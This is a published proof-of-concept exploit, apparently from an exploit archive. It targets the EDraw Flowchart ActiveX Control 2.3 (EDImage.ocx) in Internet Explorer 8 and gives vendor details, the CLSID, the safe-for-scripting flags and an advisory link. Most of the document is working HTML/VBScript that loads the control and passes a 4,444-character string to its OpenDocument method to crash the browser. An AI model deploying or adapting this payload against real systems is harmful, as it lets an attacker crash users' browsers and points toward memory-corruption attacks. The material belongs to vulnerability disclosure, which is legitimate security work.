|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58  |  ######################  EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)  Vendor: EdrawSoft - http://www.edrawsoft.com  Platform Used: MS Win XP Pro SP3 (en) / IE 8.0  CompanyName EDrawSoft  FileDescription EDraw Flowchart ActiveX Control Module  FileVersion 2, 3, 0, 6  InternalName EDrawSoft  LegalCopyright Copyright (C) 2005  OriginalFileName EDImage.OCX  ProductName EDraw Flowchart ActiveX Control Module  ProductVersion 2, 3, 0, 6  Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}  RegKey Safe for Script: True  RegKey Safe for Init: True  Implements IObjectSafety: False  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  Zero Science Lab - http://www.zeroscience.mk  liquidworm gmail com  18.04.2010  Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php ######################  <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />  <script language='vbscript'>  targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"  prototype= "Function OpenDocument ( ByVal filename As String ) As Boolean"  memberName = "OpenDocument"  progid = "EDIMAGELib.EDImage"  argCount = 1  arg1=String(4444, "J")  thricer.OpenDocument arg1   </script>  |